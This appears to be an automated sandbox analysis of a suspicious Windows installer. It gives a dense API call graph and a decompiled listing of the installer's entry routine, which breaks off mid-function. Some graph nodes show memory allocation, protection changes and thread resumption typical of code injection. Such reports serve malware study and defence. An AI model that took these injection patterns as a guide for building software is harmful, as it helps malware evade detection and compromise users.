403c00 7888->7889 7890 403c06 7889->7890 7891 403c18 7889->7891 8004 406484 wsprintfW 7890->8004 7892 40640b 3 API calls 7891->7892 7893 403c48 7892->7893 7895 403c67 lstrcatW 
7893->7895 7897 40640b 3 API calls 7893->7897 7896 403c16 7895->7896 7989 403ec2 7896->7989 7897->7895 7900 405f14 18 API calls 7901 403c99 7900->7901 7902 403d2d 7901->7902 7904 40640b 3 API calls 7901->7904 7903 405f14 18 API calls 7902->7903 7905 403d33 7903->7905 7911 403ccb 7904->7911 7906 403d43 LoadImageW 7905->7906 7907 40657a 17 API calls 7905->7907 7908 403de9 7906->7908 7909 403d6a RegisterClassW 7906->7909 7907->7906 7913 40140b 2 API calls 7908->7913 7912 403da0 SystemParametersInfoW CreateWindowExW 7909->7912 7942 403df3 7909->7942 7910 403cec lstrlenW 7915 403d20 7910->7915 7916 403cfa lstrcmpiW 7910->7916 7911->7902 7911->7910 7914 405e39 CharNextW 7911->7914 7912->7908 7917 403def 7913->7917 7918 403ce9 7914->7918 7920 405e0c 3 API calls 7915->7920 7916->7915 7919 403d0a GetFileAttributesW 7916->7919 7922 403ec2 18 API calls 7917->7922 7917->7942 7918->7910 7921 403d16 7919->7921 7923 403d26 7920->7923 7921->7915 7925 405e58 2 API calls 7921->7925 7926 403e00 7922->7926 8005 40653d lstrcpynW 7923->8005 7925->7915 7927 403e0c ShowWindow 7926->7927 7928 403e8f 7926->7928 7929 40689a 3 API calls 7927->7929 7997 405672 OleInitialize 7928->7997 7931 403e24 7929->7931 7933 403e32 GetClassInfoW 7931->7933 7936 40689a 3 API calls 7931->7936 7932 403e95 7934 403eb1 7932->7934 7935 403e99 7932->7935 7938 403e46 GetClassInfoW RegisterClassW 7933->7938 7939 403e5c DialogBoxParamW 7933->7939 7937 40140b 2 API calls 7934->7937 7940 40140b 2 API calls 7935->7940 7935->7942 7936->7933 7937->7942 7938->7939 7941 40140b 2 API calls 7939->7941 7940->7942 7941->7942 7942->7791 7943->7778 7944->7827 7945->7794 7946->7833 7947->7840 7949 405b53 CloseHandle 7948->7949 7950 405b5f 7948->7950 7949->7950 7950->7840 7952 403b2a 7951->7952 7953 403b1c CloseHandle 7951->7953 8017 403b57 7952->8017 7953->7952 7956 405c49 67 API calls 7957 403a5e OleUninitialize 7956->7957 7957->7800 7957->7801 7959 405bb2 7958->7959 7960 403a76 ExitProcess 7959->7960 7961 405bc6 
MessageBoxIndirectW 7959->7961 7961->7960 7963 401389 2 API calls 7962->7963 7964 401420 7963->7964 7964->7804 7966 406069 GetTickCount GetTempFileNameW 7965->7966 7967 40609f 7966->7967 7968 40352b 7966->7968 7967->7966 7967->7968 7968->7780 7969->7861 7970->7863 7971->7867 7973 403022 7972->7973 7974 40303a 7972->7974 7975 403032 7973->7975 7976 40302b DestroyWindow 7973->7976 7977 403042 7974->7977 7978 40304a GetTickCount 7974->7978 7975->7870 7976->7975 7985 406946 7977->7985 7980 403058 CreateDialogParamW ShowWindow 7978->7980 7981 40307b 7978->7981 7980->7981 7981->7870 7983->7877 7984->7876 7986 406963 PeekMessageW 7985->7986 7987 403048 7986->7987 7988 406959 DispatchMessageW 7986->7988 7987->7870 7988->7986 7990 403ed6 7989->7990 8006 406484 wsprintfW 7990->8006 7992 403f47 8007 403f7b 7992->8007 7994 403c77 7994->7900 7995 403f4c 7995->7994 7996 40657a 17 API calls 7995->7996 7996->7995 8010 4044e5 7997->8010 7999 4056bc 8000 4044e5 SendMessageW 7999->8000 8002 4056ce OleUninitialize 8000->8002 8001 405695 8001->7999 8013 401389 8001->8013 8002->7932 8004->7896 8005->7902 8006->7992 8008 40657a 17 API calls 8007->8008 8009 403f89 SetWindowTextW 8008->8009 8009->7995 8011 4044fd 8010->8011 8012 4044ee SendMessageW 8010->8012 8011->8001 8012->8011 8015 401390 8013->8015 8014 4013fe 8014->8001 8015->8014 8016 4013cb MulDiv SendMessageW 8015->8016 8016->8015 8018 403b65 8017->8018 8019 403b2f 8018->8019 8020 403b6a FreeLibrary GlobalFree 8018->8020 8019->7956 8020->8019 8020->8020 8730 401a30 8731 402da6 17 API calls 8730->8731 8732 401a39 ExpandEnvironmentStringsW 8731->8732 8733 401a4d 8732->8733 8735 401a60 8732->8735 8734 401a52 lstrcmpW 8733->8734 8733->8735 8734->8735 8736 402434 8737 402467 8736->8737 8738 40243c 8736->8738 8740 402da6 17 API calls 8737->8740 8739 402de6 17 API calls 8738->8739 8741 402443 8739->8741 8742 40246e 8740->8742 8744 40247b 8741->8744 8745 402da6 17 API calls 8741->8745 8747 402e64 8742->8747 8746 402454 RegDeleteValueW 
RegCloseKey 8745->8746 8746->8744 8748 402e71 8747->8748 8749 402e78 8747->8749 8748->8744 8749->8748 8751 402ea9 8749->8751 8752 4063aa RegOpenKeyExW 8751->8752 8753 402ed7 8752->8753 8754 402f81 8753->8754 8755 402ee7 RegEnumValueW 8753->8755 8756 402f0a 8753->8756 8754->8748 8755->8756 8757 402f71 RegCloseKey 8755->8757 8756->8757 8758 402f46 RegEnumKeyW 8756->8758 8759 402f4f RegCloseKey 8756->8759 8761 402ea9 6 API calls 8756->8761 8757->8754 8758->8756 8758->8759 8760 40690a 5 API calls 8759->8760 8762 402f5f 8760->8762 8761->8756 8762->8754 8763 402f63 RegDeleteKeyW 8762->8763 8763->8754 8764 2f49a80 8765 2f49b13 8764->8765 8766 2f57709 NtResumeThread 8765->8766 8767 2f49be1 8766->8767 8768 2f57709 NtResumeThread 8767->8768 8769 2f49c24 8768->8769 8770 2f57709 NtResumeThread 8769->8770 8771 2f49d01 8770->8771 8772 2f57709 NtResumeThread 8771->8772 8773 2f49d78 8772->8773 9347 401735 9348 402da6 17 API calls 9347->9348 9349 40173c SearchPathW 9348->9349 9350 401757 9349->9350 9351 2f4b181 9352 2f4b1bd 9351->9352 9353 2f57709 NtResumeThread 9352->9353 9354 2f4b376 9352->9354 9353->9354 8774 71031774 8775 710317a3 8774->8775 8776 71031bff 22 API calls 8775->8776 8777 710317aa 8776->8777 8778 710317b1 8777->8778 8779 710317bd 8777->8779 8782 71031312 2 API calls 8778->8782 8780 710317c7 8779->8780 8781 710317e4 8779->8781 8783 710315dd 3 API calls 8780->8783 8784 710317ea 8781->8784 8785 7103180e 8781->8785 8789 710317bb 8782->8789 8786 710317cc 8783->8786 8787 71031654 3 API calls 8784->8787 8788 710315dd 3 API calls 8785->8788 8790 71031654 3 API calls 8786->8790 8791 710317ef 8787->8791 8788->8789 8792 710317d2 8790->8792 8793 71031312 2 API calls 8791->8793 8794 71031312 2 API calls 8792->8794 8795 710317f5 GlobalFree 8793->8795 8796 710317d8 GlobalFree 8794->8796 8795->8789 8797 71031809 GlobalFree 8795->8797 8796->8789 8797->8789 9355 401d38 9356 402d84 17 API calls 9355->9356 9357 401d3f 9356->9357 9358 402d84 17 API calls 9357->9358 9359 401d4b 
GetDlgItem 9358->9359 9360 402638 9359->9360 9361 2f49b8c 9362 2f49be1 9361->9362 9363 2f57709 NtResumeThread 9361->9363 9364 2f57709 NtResumeThread 9362->9364 9363->9362 9365 2f49c24 9364->9365 9366 2f57709 NtResumeThread 9365->9366 9367 2f49d01 9366->9367 9368 2f57709 NtResumeThread 9367->9368 9369 2f49d78 9368->9369 8798 71031979 8799 7103199c 8798->8799 8800 710319d1 GlobalFree 8799->8800 8801 710319e3 8799->8801 8800->8801 8802 71031312 2 API calls 8801->8802 8803 71031b6e GlobalFree GlobalFree 8802->8803 8389 71032a7f 8390 71032acf 8389->8390 8391 71032a8f VirtualProtect 8389->8391 8391->8390 9370 2f4e189 9371 2f4e1c9 GetPEB 9370->9371 9373 2f4e462 9371->9373 8804 40263e 8805 402652 8804->8805 8806 40266d 8804->8806 8809 402d84 17 API calls 8805->8809 8807 402672 8806->8807 8808 40269d 8806->8808 8810 402da6 17 API calls 8807->8810 8811 402da6 17 API calls 8808->8811 8819 402659 8809->8819 8812 402679 8810->8812 8813 4026a4 lstrlenW 8811->8813 8821 40655f WideCharToMultiByte 8812->8821 8813->8819 8815 40268d lstrlenA 8815->8819 8816 4026e7 8817 4026d1 8817->8816 8818 4060df WriteFile 8817->8818 8818->8816 8819->8816 8819->8817 8822 40610e SetFilePointer 8819->8822 8821->8815 8823 40612a 8822->8823 8824 406142 8822->8824 8825 4060b0 ReadFile 8823->8825 8824->8817 8826 406136 8825->8826 8826->8824 8827 406173 SetFilePointer 8826->8827 8828 40614b SetFilePointer 8826->8828 8827->8824 8828->8827 8829 406156 8828->8829 8830 4060df WriteFile 8829->8830 8830->8824 7591 4015c1 7592 402da6 17 API calls 7591->7592 7593 4015c8 7592->7593 7594 405eb7 4 API calls 7593->7594 7607 4015d1 7594->7607 7595 401631 7597 401663 7595->7597 7598 401636 7595->7598 7596 405e39 CharNextW 7596->7607 7600 401423 24 API calls 7597->7600 7618 401423 7598->7618 7604 40165b 7600->7604 7606 40164a SetCurrentDirectoryW 7606->7604 7607->7595 7607->7596 7608 401617 GetFileAttributesW 7607->7608 7610 405b08 7607->7610 7613 405a6e CreateDirectoryW 7607->7613 7622 405aeb CreateDirectoryW 
7607->7622 7608->7607 7625 40690a GetModuleHandleA 7610->7625 7614 405abb 7613->7614 7615 405abf GetLastError 7613->7615 7614->7607 7615->7614 7616 405ace SetFileSecurityW 7615->7616 7616->7614 7617 405ae4 GetLastError 7616->7617 7617->7614 7619 40559f 24 API calls 7618->7619 7620 401431 7619->7620 7621 40653d lstrcpynW 7620->7621 7621->7606 7623 405afb 7622->7623 7624 405aff GetLastError 7622->7624 7623->7607 7624->7623 7626 406930 GetProcAddress 7625->7626 7627 406926 7625->7627 7629 405b0f 7626->7629 7631 40689a GetSystemDirectoryW 7627->7631 7629->7607 7630 40692c 7630->7626 7630->7629 7632 4068bc wsprintfW LoadLibraryExW 7631->7632 7632->7630 8831 2f48e76 8832 2f48e9b 8831->8832 8835 2f48ee8 8831->8835 8833 2f48ebc 8832->8833 8834 2f48edb 8832->8834 8833->8835 8837 2f4a20e 5 API calls 8833->8837 8834->8835 8836 2f4a20e 5 API calls 8834->8836 8836->8835 8837->8835 8838 4028c4 8839 4028ca 8838->8839 8840 4028d2 FindClose 8839->8840 8841 402c2a 8839->8841 8840->8841 8849 4016cc 8850 402da6 17 API calls 8849->8850 8851 4016d2 GetFullPathNameW 8850->8851 8852 40170e 8851->8852 8853 4016ec 8851->8853 8854 401723 GetShortPathNameW 8852->8854 8855 402c2a 8852->8855 8853->8852 8856 406873 2 API calls 8853->8856 8854->8855 8857 4016fe 8856->8857 8857->8852 8859 40653d lstrcpynW 8857->8859 8859->8852 9381 4045cf lstrcpynW lstrlenW 8075 4014d7 8076 402d84 17 API calls 8075->8076 8077 4014dd Sleep 8076->8077 8079 402c2a 8077->8079 8080 4020d8 8081 4020ea 8080->8081 8091 40219c 8080->8091 8082 402da6 17 API calls 8081->8082 8084 4020f1 8082->8084 8083 401423 24 API calls 8085 4022f6 8083->8085 8086 402da6 17 API calls 8084->8086 8087 4020fa 8086->8087 8088 402110 LoadLibraryExW 8087->8088 8089 402102 GetModuleHandleW 8087->8089 8090 402121 8088->8090 8088->8091 8089->8088 8089->8090 8103 406979 8090->8103 8091->8083 8094 402132 8096 402151 8094->8096 8097 40213a 8094->8097 8095 40216b 8098 40559f 24 API calls 8095->8098 8108 71031817 8096->8108 8100 401423 24 API calls 
8097->8100 8099 402142 8098->8099 8099->8085 8101 40218e FreeLibrary 8099->8101 8100->8099 8101->8085 8150 40655f WideCharToMultiByte 8103->8150 8105 406996 8106 40699d GetProcAddress 8105->8106 8107 40212c 8105->8107 8106->8107 8107->8094 8107->8095 8109 7103184a 8108->8109 8151 71031bff 8109->8151 8111 71031851 8112 71031976 8111->8112 8113 71031862 8111->8113 8114 71031869 8111->8114 8112->8099 8200 7103243e 8113->8200 8184 71032480 8114->8184 8119 710318af 8213 71032655 8119->8213 8120 710318cd 8125 710318d3 8120->8125 8126 7103191e 8120->8126 8121 71031898 8135 7103188e 8121->8135 8210 71032e23 8121->8210 8122 7103187f 8124 71031885 8122->8124 8128 71031890 8122->8128 8124->8135 8194 71032b98 8124->8194 8232 71031666 8125->8232 8132 71032655 10 API calls 8126->8132 8127 710318b5 8224 71031654 8127->8224 8204 71032810 8128->8204 8133 7103190f 8132->8133 8141 71031965 8133->8141 8238 71032618 8133->8238 8135->8119 8135->8120 8139 71031896 8139->8135 8140 71032655 10 API calls 8140->8133 8141->8112 8145 7103196f GlobalFree 8141->8145 8145->8112 8147 71031951 8147->8141 8242 710315dd wsprintfW 8147->8242 8148 7103194a FreeLibrary 8148->8147 8150->8105 8245 710312bb GlobalAlloc 8151->8245 8153 71031c26 8246 710312bb GlobalAlloc 8153->8246 8155 71031e6b GlobalFree GlobalFree GlobalFree 8156 71031e88 8155->8156 8174 71031ed2 8155->8174 8157 7103227e 8156->8157 8164 71031e9d 8156->8164 8156->8174 8159 710322a0 GetModuleHandleW 8157->8159 8157->8174 8158 71031d26 GlobalAlloc 8170 71031c31 8158->8170 8162 710322b1 LoadLibraryW 8159->8162 8163 710322c6 8159->8163 8160 71031d71 lstrcpyW 8166 71031d7b lstrcpyW 8160->8166 8161 71031d8f GlobalFree 8161->8170 8162->8163 8162->8174 8253 710316bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 8163->8253 8164->8174 8249 710312cc 8164->8249 8166->8170 8167 71032318 8169 71032325 lstrlenW 8167->8169 8167->8174 8168 71032126 8252 710312bb GlobalAlloc 8168->8252 8254 710316bd WideCharToMultiByte 
GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 8169->8254 8170->8155 8170->8158 8170->8160 8170->8161 8170->8166 8170->8168 8173 710321ae 8170->8173 8170->8174 8177 71032067 GlobalFree 8170->8177 8178 710312cc 2 API calls 8170->8178 8179 71031dcd 8170->8179 8173->8174 8180 71032216 lstrcpyW 8173->8180 8174->8111 8175 710322d8 8175->8167 8182 71032302 GetProcAddress 8175->8182 8177->8170 8178->8170 8179->8170 8247 7103162f GlobalSize GlobalAlloc 8179->8247 8180->8174 8182->8167 8183 7103212f 8183->8111 8192 71032498 8184->8192 8186 710325c1 GlobalFree 8189 7103186f 8186->8189 8186->8192 8187 71032540 GlobalAlloc WideCharToMultiByte 8187->8186 8188 7103256b GlobalAlloc CLSIDFromString 8188->8186 8189->8121 8189->8122 8189->8135 8190 710312cc GlobalAlloc lstrcpynW 8190->8192 8191 7103258a 8191->8186 8260 710327a4 8191->8260 8192->8186 8192->8187 8192->8188 8192->8190 8192->8191 8256 7103135a 8192->8256 8196 71032baa 8194->8196 8195 71032c4f CreateFileA 8199 71032c6d 8195->8199 8196->8195 8198 71032d39 8198->8135 8263 71032b42 8199->8263 8201 71032453 8200->8201 8202 7103245e GlobalAlloc 8201->8202 8203 71031868 8201->8203 8202->8201 8203->8114 8208 71032840 8204->8208 8205 710328db GlobalAlloc 8209 710328fe 8205->8209 8206 710328ee 8207 710328f4 GlobalSize 8206->8207 8206->8209 8207->8209 8208->8205 8208->8206 8209->8139 8212 71032e2e 8210->8212 8211 71032e6e GlobalFree 8212->8211 8267 710312bb GlobalAlloc 8213->8267 8215 7103270b lstrcpynW 8220 7103265f 8215->8220 8216 710326fa StringFromGUID2 8216->8220 8217 710326d8 MultiByteToWideChar 8217->8220 8218 7103271e wsprintfW 8218->8220 8219 71032742 GlobalFree 8219->8220 8220->8215 8220->8216 8220->8217 8220->8218 8220->8219 8221 71032777 GlobalFree 8220->8221 8222 71031312 2 API calls 8220->8222 8268 71031381 8220->8268 8221->8127 8222->8220 8272 710312bb GlobalAlloc 8224->8272 8226 71031659 8227 71031666 2 API calls 8226->8227 8228 71031663 8227->8228 8229 71031312 8228->8229 8230 71031355 GlobalFree 
8229->8230 8231 7103131b GlobalAlloc lstrcpynW 8229->8231 8230->8133 8231->8230 8233 71031672 wsprintfW 8232->8233 8235 7103169f lstrcpyW 8232->8235 8237 710316b8 8233->8237 8235->8237 8237->8140 8239 71031931 8238->8239 8240 71032626 8238->8240 8239->8147 8239->8148 8240->8239 8241 71032642 GlobalFree 8240->8241 8241->8240 8243 71031312 2 API calls 8242->8243 8244 710315fe 8243->8244 8244->8141 8245->8153 8246->8170 8248 7103164d 8247->8248 8248->8179 8255 710312bb GlobalAlloc 8249->8255 8251 710312db lstrcpynW 8251->8174 8252->8183 8253->8175 8254->8174 8255->8251 8257 71031361 8256->8257 8258 710312cc 2 API calls 8257->8258 8259 7103137f 8258->8259 8259->8192 8261 710327b2 VirtualAlloc 8260->8261 8262 71032808 8260->8262 8261->8262 8262->8191 8264 71032b4d 8263->8264 8265 71032b52 GetLastError 8264->8265 8266 71032b5d 8264->8266 8265->8266 8266->8198 8267->8220 8269 7103138a 8268->8269 8270 710313ac 8268->8270 8269->8270 8271 71031390 lstrcpyW 8269->8271 8270->8220 8271->8270 8272->8226 8864 2f4a06e 8865 2f4a0ca 8864->8865 8866 2f55355 5 API calls 8865->8866 8867 2f4a0ec 8866->8867 8403 401ede 8404 402d84 17 API calls 8403->8404 8405 401ee4 8404->8405 8406 402d84 17 API calls 8405->8406 8407 401ef0 8406->8407 8408 401f07 EnableWindow 8407->8408 8409 401efc ShowWindow 8407->8409 8410 402c2a 8408->8410 8409->8410 8411 4056de 8412 405888 8411->8412 8413 4056ff GetDlgItem GetDlgItem GetDlgItem 8411->8413 8415 405891 GetDlgItem CreateThread CloseHandle 8412->8415 8416 4058b9 8412->8416 8457 4044ce SendMessageW 8413->8457 8415->8416 8460 405672 5 API calls 8415->8460 8418 4058e4 8416->8418 8419 4058d0 ShowWindow ShowWindow 8416->8419 8420 405909 8416->8420 8417 40576f 8423 405776 GetClientRect GetSystemMetrics SendMessageW SendMessageW 8417->8423 8421 4058f0 8418->8421 8424 405944 8418->8424 8459 4044ce SendMessageW 8419->8459 8422 404500 8 API calls 8420->8422 8426 4058f8 8421->8426 8427 40591e ShowWindow 8421->8427 8428 405917 8422->8428 8431 4057e4 8423->8431 8432 
4057c8 SendMessageW SendMessageW 8423->8432 8424->8420 8433 405952 SendMessageW 8424->8433 8434 404472 SendMessageW 8426->8434 8429 405930 8427->8429 8430 40593e 8427->8430 8435 40559f 24 API calls 8429->8435 8436 404472 SendMessageW 8430->8436 8437 4057f7 8431->8437 8438 4057e9 SendMessageW 8431->8438 8432->8431 8433->8428 8439 40596b CreatePopupMenu 8433->8439 8434->8420 8435->8430 8436->8424 8441 404499 18 API calls 8437->8441 8438->8437 8440 40657a 17 API calls 8439->8440 8442 40597b AppendMenuW 8440->8442 8443 405807 8441->8443 8444 405998 GetWindowRect 8442->8444 8445 4059ab TrackPopupMenu 8442->8445 8446 405810 ShowWindow 8443->8446 8447 405844 GetDlgItem SendMessageW 8443->8447 8444->8445 8445->8428 8448 4059c6 8445->8448 8449 405833 8446->8449 8450 405826 ShowWindow 8446->8450 8447->8428 8451 40586b SendMessageW SendMessageW 8447->8451 8452 4059e2 SendMessageW 8448->8452 8458 4044ce SendMessageW 8449->8458 8450->8449 8451->8428 8452->8452 8453 4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 8452->8453 8455 405a24 SendMessageW 8453->8455 8455->8455 8456 405a4d GlobalUnlock SetClipboardData CloseClipboard 8455->8456 8456->8428 8457->8417 8458->8447 8459->8418 8868 4028de 8869 4028e6 8868->8869 8870 4028ea FindNextFileW 8869->8870 8873 4028fc 8869->8873 8871 402943 8870->8871 8870->8873 8874 40653d lstrcpynW 8871->8874 8874->8873 7342 2f55355 7343 2f547be 7342->7343 7347 2f55367 7342->7347 7344 2f54888 LoadLibraryA 7343->7344 7360 2f54ee4 GetPEB 7343->7360 7346 2f54893 7344->7346 7353 2f55603 7347->7353 7354 2f547be 7347->7354 7348 2f5486f 7348->7344 7350 2f5546d 7351 2f555c3 NtAllocateVirtualMemory 7350->7351 7352 2f46a21 7350->7352 7351->7353 7355 2f5483d 7354->7355 7356 2f54888 LoadLibraryA 7355->7356 7357 2f54ee4 4 API calls 7355->7357 7358 2f54893 7356->7358 7359 2f5486f 7357->7359 7358->7350 7359->7356 7361 2f4e980 7360->7361 7362 2f5500b 7361->7362 7364 2f547be 4 API calls 7361->7364 7365 2f53557 7361->7365 7368 2f4a256 7361->7368 7362->7348 
7364->7361 7372 2f5355d 7365->7372 7369 2f4a299 7368->7369 7380 2f55355 7369->7380 7371 2f4a2ba 7371->7361 7373 2f5359e 7372->7373 7374 2f55355 5 API calls 7373->7374 7375 2f53640 7374->7375 7392 2f539f8 7375->7392 7377 2f536f9 7379 2f54066 7377->7379 7395 2f537fb 7377->7395 7381 2f547be 7380->7381 7385 2f55367 7380->7385 7382 2f54888 LoadLibraryA 7381->7382 7383 2f54ee4 3 API calls 7381->7383 7384 2f54893 7382->7384 7386 2f5486f 7383->7386 7384->7371 7387 2f547be 3 API calls 7385->7387 7391 2f55603 7385->7391 7386->7382 7388 2f5546d 7387->7388 7389 2f555c3 NtAllocateVirtualMemory 7388->7389 7390 2f46a21 7388->7390 7389->7391 7390->7371 7391->7371 7393 2f53a26 CreateFileA 7392->7393 7393->7377 7396 2f5384e 7395->7396 7397 2f55355 5 API calls 7396->7397 7398 2f538be 7397->7398 7399 2f539f8 CreateFileA 7398->7399 7400 2f538ff 7399->7400 7400->7379 8875 404ce0 8876 404cf0 8875->8876 8877 404d0c 8875->8877 8886 405b81 GetDlgItemTextW 8876->8886 8878 404d12 SHGetPathFromIDListW 8877->8878 8879 404d3f 8877->8879 8881 404d22 8878->8881 8885 404d29 SendMessageW 8878->8885 8883 40140b 2 API calls 8881->8883 8882 404cfd SendMessageW 8882->8877 8883->8885 8885->8879 8886->8882 8887 2f4a25d 8888 2f55355 5 API calls 8887->8888 8889 2f4a2ba 8887->8889 8888->8889 9386 2f4af5d 9387 2f4af95 9386->9387 9388 2f4af9a 9386->9388 9387->9388 9389 2f57709 NtResumeThread 9387->9389 9390 2f46986 9388->9390 9391 2f57709 NtResumeThread 9388->9391 9392 2f4b17f 9388->9392 9389->9388 9391->9392 9392->9390 9393 2f57709 NtResumeThread 9392->9393 9393->9390 8890 402aeb 8891 402d84 17 API calls 8890->8891 8892 402af1 8891->8892 8893 40292e 8892->8893 8894 40657a 17 API calls 8892->8894 8894->8893 9394 2f4a55f 9395 2f4a576 9394->9395 9396 2f54888 LoadLibraryA 9395->9396 9397 2f54ee4 5 API calls 9395->9397 9398 2f54893 9396->9398 9399 2f5486f 9397->9399 9399->9396 8895 4026ec 8896 402d84 17 API calls 8895->8896 8898 4026fb 8896->8898 8897 402745 ReadFile 8897->8898 8907 402838 8897->8907 8898->8897 
8899 4060b0 ReadFile 8898->8899 8900 40610e 5 API calls 8898->8900 8901 402785 MultiByteToWideChar 8898->8901 8902 40283a 8898->8902 8904 4027ab SetFilePointer MultiByteToWideChar 8898->8904 8905 40284b 8898->8905 8898->8907 8899->8898 8900->8898 8901->8898 8908 406484 wsprintfW 8902->8908 8904->8898 8906 40286c SetFilePointer 8905->8906 8905->8907 8906->8907 8908->8907 8909 2f4e245 8910 2f4e296 GetPEB 8909->8910 8911 2f4e28d 8909->8911 8912 2f4e2b6 8910->8912 8911->8910 8911->8911 9404 4023f4 9405 402da6 17 API calls 9404->9405 9406 402403 9405->9406 9407 402da6 17 API calls 9406->9407 9408 40240c 9407->9408 9409 402da6 17 API calls 9408->9409 9410 402416 GetPrivateProfileStringW 9409->9410 8913 4014f5 SetForegroundWindow 8914 402c2a 8913->8914 9411 401ff6 9412 402da6 17 API calls 9411->9412 9413 401ffd 9412->9413 9414 406873 2 API calls 9413->9414 9415 402003 9414->9415 9417 402014 9415->9417 9418 406484 wsprintfW 9415->9418 9418->9417 8379 2f47848 8382 2f475df 8379->8382 8380 2f478b6 8381 2f56fc6 NtProtectVirtualMemory 8381->8382 8382->8379 8382->8380 8382->8381 8918 4022ff 8919 402da6 17 API calls 8918->8919 8920 402305 8919->8920 8921 402da6 17 API calls 8920->8921 8922 40230e 8921->8922 8923 402da6 17 API calls 8922->8923 8924 402317 8923->8924 8925 406873 2 API calls 8924->8925 8926 402320 8925->8926 8927 402331 lstrlenW lstrlenW 8926->8927 8931 402324 8926->8931 8929 40559f 24 API calls 8927->8929 8928 40559f 24 API calls 8932 40232c 8928->8932 8930 40236f SHFileOperationW 8929->8930 8930->8931 8930->8932 8931->8928 8931->8932 9426 4019ff 9427 402da6 17 API calls 9426->9427 9428 401a06 9427->9428 9429 402da6 17 API calls 9428->9429 9430 401a0f 9429->9430 9431 401a16 lstrcmpiW 9430->9431 9432 401a28 lstrcmpW 9430->9432 9433 401a1c 9431->9433 9432->9433 8933 2f49c35 8934 2f49d01 8933->8934 8935 2f57709 NtResumeThread 8933->8935 8936 2f57709 NtResumeThread 8934->8936 8935->8934 8937 2f49d78 8936->8937 9434 401d81 9435 401d94 GetDlgItem 9434->9435 9436 401d87 

Control-flow Graph

[Control-flow graph figure not reproduced. Legend: Executed / Not Executed.]
                                                                                      C-Code - Quality: 79%
                                                                                      			_entry_() {
                                                                                      				WCHAR* _v8;
                                                                                      				signed int _v12;
                                                                                      				void* _v16;
                                                                                      				signed int _v20;
                                                                                      				int _v24;
                                                                                      				int _v28;
                                                                                      				struct _TOKEN_PRIVILEGES _v40;
                                                                                      				signed char _v42;
                                                                                      				int _v44;
                                                                                      				signed int _v48;
                                                                                      				intOrPtr _v278;
                                                                                      				signed short _v310;
                                                                                      				struct _OSVERSIONINFOW _v324;
                                                                                      				struct _SHFILEINFOW _v1016;
                                                                                      				intOrPtr* _t88;
                                                                                      				WCHAR* _t92;
                                                                                      				char* _t94;
                                                                                      				void _t97;
                                                                                      				void* _t116;
                                                                                      				WCHAR* _t118;
                                                                                      				signed int _t120;
                                                                                      				intOrPtr* _t124;
                                                                                      				void* _t138;
                                                                                      				short _t144;
                                                                                      				void* _t149;
                                                                                      				void* _t153;
                                                                                      				void* _t158;
                                                                                      				signed int _t168;
                                                                                      				void* _t171;
                                                                                      				void* _t176;
                                                                                      				intOrPtr _t178;
                                                                                      				intOrPtr _t179;
                                                                                      				intOrPtr* _t180;
                                                                                      				int _t189;
                                                                                      				void* _t190;
                                                                                      				void* _t199;
                                                                                      				signed int _t205;
                                                                                      				signed int _t210;
                                                                                      				signed int _t215;
                                                                                      				signed int _t217;
                                                                                      				int* _t219;
                                                                                      				signed int _t227;
                                                                                      				signed int _t230;
                                                                                      				CHAR* _t232;
                                                                                      				char* _t233;
                                                                                      				signed int _t234;
                                                                                      				WCHAR* _t235;
                                                                                      				void* _t251;
                                                                                      
                                                                                      				_t217 = 0x20;
                                                                                      				_t189 = 0;
                                                                                      				_v24 = 0;
                                                                                      				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                                      				_v20 = 0;
                                                                                      				SetErrorMode(0x8001); // executed
                                                                                      				_v324.szCSDVersion = 0;
                                                                                      				_v48 = 0;
                                                                                      				_v44 = 0;
                                                                                      				_v324.dwOSVersionInfoSize = 0x11c;
                                                                                      				if(GetVersionExW( &_v324) == 0) {
                                                                                      					_v324.dwOSVersionInfoSize = 0x114;
                                                                                      					GetVersionExW( &_v324);
                                                                                      					asm("sbb eax, eax");
                                                                                      					_v42 = 4;
                                                                                      					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                                                                      				}
                                                                                      				if(_v324.dwMajorVersion < 0xa) {
                                                                                      					_v310 = _v310 & 0x00000000;
                                                                                      				}
                                                                                      				 *0x434fb8 = _v324.dwBuildNumber;
                                                                                      				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                                                      				if( *0x434fbe != 0x600) {
                                                                                      					_t180 = E0040690A(_t189);
                                                                                      					if(_t180 != _t189) {
                                                                                      						 *_t180(0xc00);
                                                                                      					}
                                                                                      				}
                                                                                      				_t232 = "UXTHEME";
                                                                                      				do {
                                                                                      					E0040689A(_t232); // executed
                                                                                      					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
                                                                                      				} while ( *_t232 != 0);
                                                                                      				E0040690A(0xb);
                                                                                      				 *0x434f04 = E0040690A(9);
                                                                                      				_t88 = E0040690A(7);
                                                                                      				if(_t88 != _t189) {
                                                                                      					_t88 =  *_t88(0x1e);
                                                                                      					if(_t88 != 0) {
                                                                                      						 *0x434fbc =  *0x434fbc | 0x00000080;
                                                                                      					}
                                                                                      				}
                                                                                      				__imp__#17();
                                                                                      				__imp__OleInitialize(_t189); // executed
                                                                                      				 *0x434fc0 = _t88;
                                                                                      				SHGetFileInfoW(0x42b228, _t189,  &_v1016, 0x2b4, _t189); // executed
                                                                                      				E0040653D(0x433f00, L"NSIS Error");
                                                                                      				_t92 = GetCommandLineW();
                                                                                      				_t233 = L"\"C:\\Users\\Arthur\\Desktop\\xcVh7ZmH4Y.exe\" ";
                                                                                      				E0040653D(_t233, _t92);
                                                                                      				_t94 = _t233;
                                                                                      				_t234 = 0x22;
                                                                                      				 *0x434f00 = 0x400000;
                                                                                      				_t251 = L"\"C:\\Users\\Arthur\\Desktop\\xcVh7ZmH4Y.exe\" " - _t234; // 0x22
                                                                                      				if(_t251 == 0) {
                                                                                      					_t217 = _t234;
                                                                                      					_t94 =  &M00440002;
                                                                                      				}
                                                                                      				_t199 = CharNextW(E00405E39(_t94, _t217));
                                                                                      				_v16 = _t199;
                                                                                      				while(1) {
                                                                                      					_t97 =  *_t199;
                                                                                      					_t252 = _t97 - _t189;
                                                                                      					if(_t97 == _t189) {
                                                                                      						break;
                                                                                      					}
                                                                                      					_t210 = 0x20;
                                                                                      					__eflags = _t97 - _t210;
                                                                                      					if(_t97 != _t210) {
                                                                                      						L17:
